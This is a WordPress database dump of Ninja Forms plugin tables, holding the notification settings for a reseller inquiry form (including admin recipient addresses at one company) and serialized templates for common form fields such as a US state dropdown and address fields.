INSERT INTO `wp_nf_objectmeta` VALUES (197, 18, 'form_title', 'Reseller'); 
INSERT INTO `wp_nf_objectmeta` VALUES (198, 18, 'last_sub', '4'); 
INSERT INTO `wp_nf_objectmeta` VALUES (204, 20, 'date_updated', '2017-08-21'); 
INSERT INTO `wp_nf_objectmeta` VALUES (205, 20, 'active', '1'); 
INSERT INTO `wp_nf_objectmeta` VALUES (206, 20, 'name', 'Success Message'); 
INSERT INTO `wp_nf_objectmeta` VALUES (207, 20, 'type', 'success_message'); 
INSERT INTO `wp_nf_objectmeta` VALUES (208, 20, 'from_name', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (209, 20, 'from_address', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (210, 20, 'to', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (211, 20, 'email_subject', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (212, 20, 'email_message', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (213, 20, 'attach_csv', '0'); 
INSERT INTO `wp_nf_objectmeta` VALUES (214, 20, 'email_format', 'html'); 
INSERT INTO `wp_nf_objectmeta` VALUES (215, 20, 'reply_to', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (216, 20, 'cc', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (217, 20, 'bcc', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (218, 20, 'redirect_url', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (219, 20, 'success_msg', 'Your form has been successfully submitted. Thank you. '); 
INSERT INTO `wp_nf_objectmeta` VALUES (220, 21, 'date_updated', '2017-08-21'); 
INSERT INTO `wp_nf_objectmeta` VALUES (221, 21, 'active', '1'); 
INSERT INTO `wp_nf_objectmeta` VALUES (222, 21, 'name', 'Email User'); 
INSERT INTO `wp_nf_objectmeta` VALUES (223, 21, 'type', 'email'); 
INSERT INTO `wp_nf_objectmeta` VALUES (224, 21, 'from_name', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (225, 21, 'from_address', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (226, 21, 'to', 'field_37'); 
INSERT INTO `wp_nf_objectmeta` VALUES (227, 21, 'email_subject', 'Thank you for your interest in distributing our products!'); 
INSERT INTO `wp_nf_objectmeta` VALUES (228, 21, 'email_message', 'Thank you so much for contacting us. We will get back to you shortly.'); 
INSERT INTO `wp_nf_objectmeta` VALUES (229, 21, 'attach_csv', '1'); 
INSERT INTO `wp_nf_objectmeta` VALUES (230, 21, 'email_format', 'html'); 
INSERT INTO `wp_nf_objectmeta` VALUES (231, 21, 'reply_to', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (232, 21, 'cc', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (233, 21, 'bcc', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (234, 21, 'redirect_url', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (235, 21, 'success_msg', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (236, 22, 'date_updated', '2017-08-21'); 
INSERT INTO `wp_nf_objectmeta` VALUES (237, 22, 'active', '1'); 
INSERT INTO `wp_nf_objectmeta` VALUES (238, 22, 'name', 'Email Admin'); 
INSERT INTO `wp_nf_objectmeta` VALUES (239, 22, 'type', 'email'); 
INSERT INTO `wp_nf_objectmeta` VALUES (240, 22, 'from_name', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (241, 22, 'from_address', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (242, 22, 'to', 'zchowdhury@mschem.com`ddillulio@mschem.com`wmarotta@mschem.com`cpavlik@mschem.com'); 
INSERT INTO `wp_nf_objectmeta` VALUES (243, 22, 'email_subject', 'New Reseller Form'); 
INSERT INTO `wp_nf_objectmeta` VALUES (244, 22, 'email_message', '[ninja_forms_all_fields]'); 
INSERT INTO `wp_nf_objectmeta` VALUES (245, 22, 'attach_csv', '0'); 
INSERT INTO `wp_nf_objectmeta` VALUES (246, 22, 'email_format', 'html'); 
INSERT INTO `wp_nf_objectmeta` VALUES (247, 22, 'reply_to', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (248, 22, 'cc', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (249, 22, 'bcc', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (250, 22, 'redirect_url', ''); 
INSERT INTO `wp_nf_objectmeta` VALUES (251, 22, 'success_msg', '');
#
# End of data contents of table `wp_nf_objectmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_nf_objects`


#
# Delete any existing table `wp_nf_objects`
#

DROP TABLE IF EXISTS `wp_nf_objects`;


#
# Table structure of table `wp_nf_objects`
#

CREATE TABLE `wp_nf_objects` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `type` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_nf_objects`
#
 
INSERT INTO `wp_nf_objects` VALUES (1, 'form'); 
INSERT INTO `wp_nf_objects` VALUES (2, 'notification'); 
INSERT INTO `wp_nf_objects` VALUES (3, 'notification'); 
INSERT INTO `wp_nf_objects` VALUES (4, 'notification'); 
INSERT INTO `wp_nf_objects` VALUES (11, 'form'); 
INSERT INTO `wp_nf_objects` VALUES (12, 'notification'); 
INSERT INTO `wp_nf_objects` VALUES (13, 'notification'); 
INSERT INTO `wp_nf_objects` VALUES (14, 'notification'); 
INSERT INTO `wp_nf_objects` VALUES (18, 'form'); 
INSERT INTO `wp_nf_objects` VALUES (20, 'notification'); 
INSERT INTO `wp_nf_objects` VALUES (21, 'notification'); 
INSERT INTO `wp_nf_objects` VALUES (22, 'notification');
#
# End of data contents of table `wp_nf_objects`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_nf_relationships`


#
# Delete any existing table `wp_nf_relationships`
#

DROP TABLE IF EXISTS `wp_nf_relationships`;


#
# Table structure of table `wp_nf_relationships`
#

CREATE TABLE `wp_nf_relationships` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `child_id` bigint(20) NOT NULL,
  `parent_id` bigint(20) NOT NULL,
  `child_type` varchar(255) NOT NULL,
  `parent_type` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_nf_relationships`
#
 
INSERT INTO `wp_nf_relationships` VALUES (1, 2, 1, 'notification', 'form'); 
INSERT INTO `wp_nf_relationships` VALUES (2, 3, 1, 'notification', 'form'); 
INSERT INTO `wp_nf_relationships` VALUES (3, 4, 1, 'notification', 'form'); 
INSERT INTO `wp_nf_relationships` VALUES (4, 12, 11, 'notification', 'form'); 
INSERT INTO `wp_nf_relationships` VALUES (5, 13, 11, 'notification', 'form'); 
INSERT INTO `wp_nf_relationships` VALUES (6, 14, 11, 'notification', 'form'); 
INSERT INTO `wp_nf_relationships` VALUES (7, 20, 18, 'notification', 'form'); 
INSERT INTO `wp_nf_relationships` VALUES (8, 21, 18, 'notification', 'form'); 
INSERT INTO `wp_nf_relationships` VALUES (9, 22, 18, 'notification', 'form');
#
# End of data contents of table `wp_nf_relationships`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_ninja_forms_fav_fields`


#
# Delete any existing table `wp_ninja_forms_fav_fields`
#

DROP TABLE IF EXISTS `wp_ninja_forms_fav_fields`;


#
# Table structure of table `wp_ninja_forms_fav_fields`
#

CREATE TABLE `wp_ninja_forms_fav_fields` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `row_type` int(11) NOT NULL,
  `type` varchar(255) NOT NULL,
  `order` int(11) NOT NULL,
  `data` longtext NOT NULL,
  `name` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=93 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_ninja_forms_fav_fields`
#
 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (2, 0, '_list', 0, 'a:10:{s:5:"label";s:14:"State Dropdown";s:9:"label_pos";s:4:"left";s:9:"list_type";s:8:"dropdown";s:10:"multi_size";s:1:"5";s:15:"list_show_value";s:1:"1";s:4:"list";a:1:{s:7:"options";a:51:{i:0;a:3:{s:5:"label";s:7:"Alabama";s:5:"value";s:2:"AL";s:8:"selected";s:1:"0";}i:1;a:3:{s:5:"label";s:6:"Alaska";s:5:"value";s:2:"AK";s:8:"selected";s:1:"0";}i:2;a:3:{s:5:"label";s:7:"Arizona";s:5:"value";s:2:"AZ";s:8:"selected";s:1:"0";}i:3;a:3:{s:5:"label";s:8:"Arkansas";s:5:"value";s:2:"AR";s:8:"selected";s:1:"0";}i:4;a:3:{s:5:"label";s:10:"California";s:5:"value";s:2:"CA";s:8:"selected";s:1:"0";}i:5;a:3:{s:5:"label";s:8:"Colorado";s:5:"value";s:2:"CO";s:8:"selected";s:1:"0";}i:6;a:3:{s:5:"label";s:11:"Connecticut";s:5:"value";s:2:"CT";s:8:"selected";s:1:"0";}i:7;a:3:{s:5:"label";s:8:"Delaware";s:5:"value";s:2:"DE";s:8:"selected";s:1:"0";}i:8;a:3:{s:5:"label";s:20:"District of Columbia";s:5:"value";s:2:"DC";s:8:"selected";s:1:"0";}i:9;a:3:{s:5:"label";s:7:"Florida";s:5:"value";s:2:"FL";s:8:"selected";s:1:"0";}i:10;a:3:{s:5:"label";s:7:"Georgia";s:5:"value";s:2:"GA";s:8:"selected";s:1:"0";}i:11;a:3:{s:5:"label";s:6:"Hawaii";s:5:"value";s:2:"HI";s:8:"selected";s:1:"0";}i:12;a:3:{s:5:"label";s:5:"Idaho";s:5:"value";s:2:"ID";s:8:"selected";s:1:"0";}i:13;a:3:{s:5:"label";s:8:"Illinois";s:5:"value";s:2:"IL";s:8:"selected";s:1:"0";}i:14;a:3:{s:5:"label";s:7:"Indiana";s:5:"value";s:2:"IN";s:8:"selected";s:1:"0";}i:15;a:3:{s:5:"label";s:4:"Iowa";s:5:"value";s:2:"IA";s:8:"selected";s:1:"0";}i:16;a:3:{s:5:"label";s:6:"Kansas";s:5:"value";s:2:"KS";s:8:"selected";s:1:"0";}i:17;a:3:{s:5:"label";s:8:"Kentucky";s:5:"value";s:2:"KY";s:8:"selected";s:1:"0";}i:18;a:3:{s:5:"label";s:9:"Louisiana";s:5:"value";s:2:"LA";s:8:"selected";s:1:"0";}i:19;a:3:{s:5:"label";s:5:"Maine";s:5:"value";s:2:"ME";s:8:"selected";s:1:"0";}i:20;a:3:{s:5:"label";s:8:"Maryland";s:5:"value";s:2:"MD";s:8:"selected";s:1:"0";}i:21;a:3:{s:5:"label";s:13:"Massachusetts";s:5:"value";s:2:"MA";s:8:"selected";s:1:"0";}i:22;a:3:{s:5:"label";s:8:"Michigan";s:5:"value";s:2:"MI";s:8:"selected";s:1:"0";}i:23;a:3:{s:5:"label";s:9:"Minnesota";s:5:"value";s:2:"MN";s:8:"selected";s:1:"0";}i:24;a:3:{s:5:"label";s:11:"Mississippi";s:5:"value";s:2:"MS";s:8:"selected";s:1:"0";}i:25;a:3:{s:5:"label";s:8:"Missouri";s:5:"value";s:2:"MO";s:8:"selected";s:1:"0";}i:26;a:3:{s:5:"label";s:7:"Montana";s:5:"value";s:2:"MT";s:8:"selected";s:1:"0";}i:27;a:3:{s:5:"label";s:8:"Nebraska";s:5:"value";s:2:"NE";s:8:"selected";s:1:"0";}i:28;a:3:{s:5:"label";s:6:"Nevada";s:5:"value";s:2:"NV";s:8:"selected";s:1:"0";}i:29;a:3:{s:5:"label";s:13:"New Hampshire";s:5:"value";s:2:"NH";s:8:"selected";s:1:"0";}i:30;a:3:{s:5:"label";s:10:"New Jersey";s:5:"value";s:2:"NJ";s:8:"selected";s:1:"0";}i:31;a:3:{s:5:"label";s:10:"New Mexico";s:5:"value";s:2:"NM";s:8:"selected";s:1:"0";}i:32;a:3:{s:5:"label";s:8:"New York";s:5:"value";s:2:"NY";s:8:"selected";s:1:"0";}i:33;a:3:{s:5:"label";s:14:"North Carolina";s:5:"value";s:2:"NC";s:8:"selected";s:1:"0";}i:34;a:3:{s:5:"label";s:12:"North Dakota";s:5:"value";s:2:"ND";s:8:"selected";s:1:"0";}i:35;a:3:{s:5:"label";s:4:"Ohio";s:5:"value";s:2:"OH";s:8:"selected";s:1:"0";}i:36;a:3:{s:5:"label";s:8:"Oklahoma";s:5:"value";s:2:"OK";s:8:"selected";s:1:"0";}i:37;a:3:{s:5:"label";s:6:"Oregon";s:5:"value";s:2:"OR";s:8:"selected";s:1:"0";}i:38;a:3:{s:5:"label";s:12:"Pennsylvania";s:5:"value";s:2:"PA";s:8:"selected";s:1:"0";}i:39;a:3:{s:5:"label";s:12:"Rhode Island";s:5:"value";s:2:"RI";s:8:"selected";s:1:"0";}i:40;a:3:{s:5:"label";s:14:"South Carolina";s:5:"value";s:2:"SC";s:8:"selected";s:1:"0";}i:41;a:3:{s:5:"label";s:12:"South Dakota";s:5:"value";s:2:"SD";s:8:"selected";s:1:"0";}i:42;a:3:{s:5:"label";s:9:"Tennessee";s:5:"value";s:2:"TN";s:8:"selected";s:1:"0";}i:43;a:3:{s:5:"label";s:5:"Texas";s:5:"value";s:2:"TX";s:8:"selected";s:1:"0";}i:44;a:3:{s:5:"label";s:4:"Utah";s:5:"value";s:2:"UT";s:8:"selected";s:1:"0";}i:45;a:3:{s:5:"label";s:7:"Vermont";s:5:"value";s:2:"VT";s:8:"selected";s:1:"0";}i:46;a:3:{s:5:"label";s:8:"Virginia";s:5:"value";s:2:"VA";s:8:"selected";s:1:"0";}i:47;a:3:{s:5:"label";s:10:"Washington";s:5:"value";s:2:"WA";s:8:"selected";s:1:"0";}i:48;a:3:{s:5:"label";s:13:"West Virginia";s:5:"value";s:2:"WV";s:8:"selected";s:1:"0";}i:49;a:3:{s:5:"label";s:9:"Wisconsin";s:5:"value";s:2:"WI";s:8:"selected";s:1:"0";}i:50;a:3:{s:5:"label";s:7:"Wyoming";s:5:"value";s:2:"WY";s:8:"selected";s:1:"0";}}}s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";}', 'State Dropdown'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (3, 0, '_spam', 0, 'a:6:{s:9:"label_pos";s:4:"left";s:5:"label";s:18:"Anti-Spam Question";s:6:"answer";s:16:"Anti-Spam Answer";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";}', 'Anti-Spam'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (4, 0, '_submit', 0, 'a:4:{s:5:"label";s:6:"Submit";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";}', 'Submit'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (5, 0, '_tax', 0, 'a:11:{s:5:"label";s:3:"Tax";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:19:"payment_field_group";s:1:"1";s:11:"payment_tax";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:11:"conditional";s:0:"";s:11:"calc_option";s:1:"0";s:4:"calc";s:0:"";}', 'Tax'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (6, 0, '_text', 0, 'a:19:{s:5:"label";s:10:"First Name";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"1";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'First Name'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (7, 0, '_text', 0, 'a:19:{s:5:"label";s:9:"Last Name";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"1";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Last Name'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (8, 0, '_text', 0, 'a:23:{s:5:"label";s:9:"Address 1";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"1";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Address 1'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (9, 0, '_text', 0, 'a:23:{s:5:"label";s:9:"Address 2";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"1";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Address 2'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (10, 0, '_text', 0, 'a:23:{s:5:"label";s:4:"City";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"1";s:8:"user_zip";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'City'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (11, 0, '_list', 0, 'a:16:{s:5:"label";s:5:"State";s:9:"label_pos";s:5:"above";s:10:"multi_size";s:1:"5";s:15:"list_show_value";s:1:"1";s:4:"list";a:1:{s:7:"options";a:51:{i:0;a:4:{s:5:"label";s:7:"Alabama";s:5:"value";s:2:"AL";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:1;a:4:{s:5:"label";s:6:"Alaska";s:5:"value";s:2:"AK";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:2;a:4:{s:5:"label";s:7:"Arizona";s:5:"value";s:2:"AZ";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:3;a:4:{s:5:"label";s:8:"Arkansas";s:5:"value";s:2:"AR";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:4;a:4:{s:5:"label";s:10:"California";s:5:"value";s:2:"CA";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:5;a:4:{s:5:"label";s:8:"Colorado";s:5:"value";s:2:"CO";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:6;a:4:{s:5:"label";s:11:"Connecticut";s:5:"value";s:2:"CT";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:7;a:4:{s:5:"label";s:8:"Delaware";s:5:"value";s:2:"DE";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:8;a:4:{s:5:"label";s:20:"District of Columbia";s:5:"value";s:2:"DC";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:9;a:4:{s:5:"label";s:7:"Florida";s:5:"value";s:2:"FL";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:10;a:4:{s:5:"label";s:7:"Georgia";s:5:"value";s:2:"GA";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:11;a:4:{s:5:"label";s:6:"Hawaii";s:5:"value";s:2:"HI";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:12;a:4:{s:5:"label";s:5:"Idaho";s:5:"value";s:2:"ID";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:13;a:4:{s:5:"label";s:8:"Illinois";s:5:"value";s:2:"IL";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:14;a:4:{s:5:"label";s:7:"Indiana";s:5:"value";s:2:"IN";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:15;a:4:{s:5:"label";s:4:"Iowa";s:5:"value";s:2:"IA";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:16;a:4:{s:5:"label";s:6:"Kansas";s:5:"value";s:2:"KS";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:17;a:4:{s:5:"label";s:8:"Kentucky";s:5:"value";s:2:"KY";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:18;a:4:{s:5:"label";s:9:"Louisiana";s:5:"value";s:2:"LA";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:19;a:4:{s:5:"label";s:5:"Maine";s:5:"value";s:2:"ME";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:20;a:4:{s:5:"label";s:8:"Maryland";s:5:"value";s:2:"MD";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:21;a:4:{s:5:"label";s:13:"Massachusetts";s:5:"value";s:2:"MA";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:22;a:4:{s:5:"label";s:8:"Michigan";s:5:"value";s:2:"MI";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:23;a:4:{s:5:"label";s:9:"Minnesota";s:5:"value";s:2:"MN";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:24;a:4:{s:5:"label";s:11:"Mississippi";s:5:"value";s:2:"MS";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:25;a:4:{s:5:"label";s:8:"Missouri";s:5:"value";s:2:"MO";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:26;a:4:{s:5:"label";s:7:"Montana";s:5:"value";s:2:"MT";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:27;a:4:{s:5:"label";s:8:"Nebraska";s:5:"value";s:2:"NE";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:28;a:4:{s:5:"label";s:6:"Nevada";s:5:"value";s:2:"NV";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:29;a:4:{s:5:"label";s:13:"New Hampshire";s:5:"value";s:2:"NH";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:30;a:4:{s:5:"label";s:10:"New Jersey";s:5:"value";s:2:"NJ";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:31;a:4:{s:5:"label";s:10:"New Mexico";s:5:"value";s:2:"NM";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:32;a:4:{s:5:"label";s:8:"New York";s:5:"value";s:2:"NY";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:33;a:4:{s:5:"label";s:14:"North Carolina";s:5:"value";s:2:"NC";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:34;a:4:{s:5:"label";s:12:"North Dakota";s:5:"value";s:2:"ND";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:35;a:4:{s:5:"label";s:4:"Ohio";s:5:"value";s:2:"OH";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:36;a:4:{s:5:"label";s:8:"Oklahoma";s:5:"value";s:2:"OK";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:37;a:4:{s:5:"label";s:6:"Oregon";s:5:"value";s:2:"OR";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:38;a:4:{s:5:"label";s:12:"Pennsylvania";s:5:"value";s:2:"PA";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:39;a:4:{s:5:"label";s:12:"Rhode Island";s:5:"value";s:2:"RI";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:40;a:4:{s:5:"label";s:14:"South Carolina";s:5:"value";s:2:"SC";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:41;a:4:{s:5:"label";s:12:"South Dakota";s:5:"value";s:2:"SD";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:42;a:4:{s:5:"label";s:9:"Tennessee";s:5:"value";s:2:"TN";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:43;a:4:{s:5:"label";s:5:"Texas";s:5:"value";s:2:"TX";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:44;a:4:{s:5:"label";s:4:"Utah";s:5:"value";s:2:"UT";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:45;a:4:{s:5:"label";s:7:"Vermont";s:5:"value";s:2:"VT";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:46;a:4:{s:5:"label";s:8:"Virginia";s:5:"value";s:2:"VA";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:47;a:4:{s:5:"label";s:10:"Washington";s:5:"value";s:2:"WA";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:48;a:4:{s:5:"label";s:13:"West Virginia";s:5:"value";s:2:"WV";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:49;a:4:{s:5:"label";s:9:"Wisconsin";s:5:"value";s:2:"WI";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}i:50;a:4:{s:5:"label";s:7:"Wyoming";s:5:"value";s:2:"WY";s:4:"calc";s:0:"";s:8:"selected";s:1:"0";}}}s:9:"list_type";s:8:"dropdown";s:10:"user_state";s:1:"1";s:21:"user_info_field_group";s:1:"1";s:13:"populate_term";s:0:"";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'State'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (12, 0, '_text', 0, 'a:23:{s:5:"label";s:15:"Zip / Post Code";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"1";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Zip / Post Code'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (13, 0, '_country', 0, 'a:10:{s:5:"label";s:7:"Country";s:9:"label_pos";s:5:"above";s:13:"default_value";s:2:"US";s:21:"user_info_field_group";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Country'); 
INSERT INTO `wp_ninja_forms_fav_fields` VALUES (14, 0, '_text', 0, 'a:25:{s:5:"label";s:5:"Email";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"1";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:14:"user_address_1";s:1:"0";s:14:"user_address_2";s:1:"0";s:9:"user_city";s:1:"0";s:8:"user_zip";s:1:"0";s:10:"user_phone";s:1:"0";s:10:"user_email";s:1:"1";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"0";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";}', 'Email'); 
